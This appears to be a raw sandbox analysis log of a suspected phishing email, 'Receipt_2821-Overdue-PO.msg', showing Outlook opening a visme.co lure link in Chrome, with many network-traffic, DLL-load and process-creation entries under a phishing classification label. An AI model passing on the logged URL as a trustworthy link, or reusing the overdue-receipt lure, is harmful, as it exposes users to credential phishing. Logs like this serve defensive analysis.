Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownHTTPS traffic detected: 20.190.151.8:443 -> 192.168.2.18:49701 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.18:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.18:49759 version: TLS 1.2
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
Source: classification engineClassification label: mal48.phis.winMSG@24/238@96/318
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240328T1519510128-3852.etl
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\Receipt_2821-Overdue-PO.msg"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "2AA0BA73-43F8-4765-B495-A61ABFA75E18" "274CD259-4C77-44C5-A506-4A5BBBB8B506" "3852" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "2AA0BA73-43F8-4765-B495-A61ABFA75E18" "274CD259-4C77-44C5-A506-4A5BBBB8B506" "3852" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://my.visme.co/view/319jm3x1-paragon-rapid-technology-ltd#s1
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1916,i,2926728915125596001,14556452611594666232,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://my.visme.co/view/319jm3x1-paragon-rapid-technology-ltd#s1
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1916,i,2926728915125596001,14556452611594666232,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3176 --field-trial-handle=1916,i,2926728915125596001,14556452611594666232,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3208 --field-trial-handle=1916,i,2926728915125596001,14556452611594666232,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3176 --field-trial-handle=1916,i,2926728915125596001,14556452611594666232,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3208 --field-trial-handle=1916,i,2926728915125596001,14556452611594666232,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
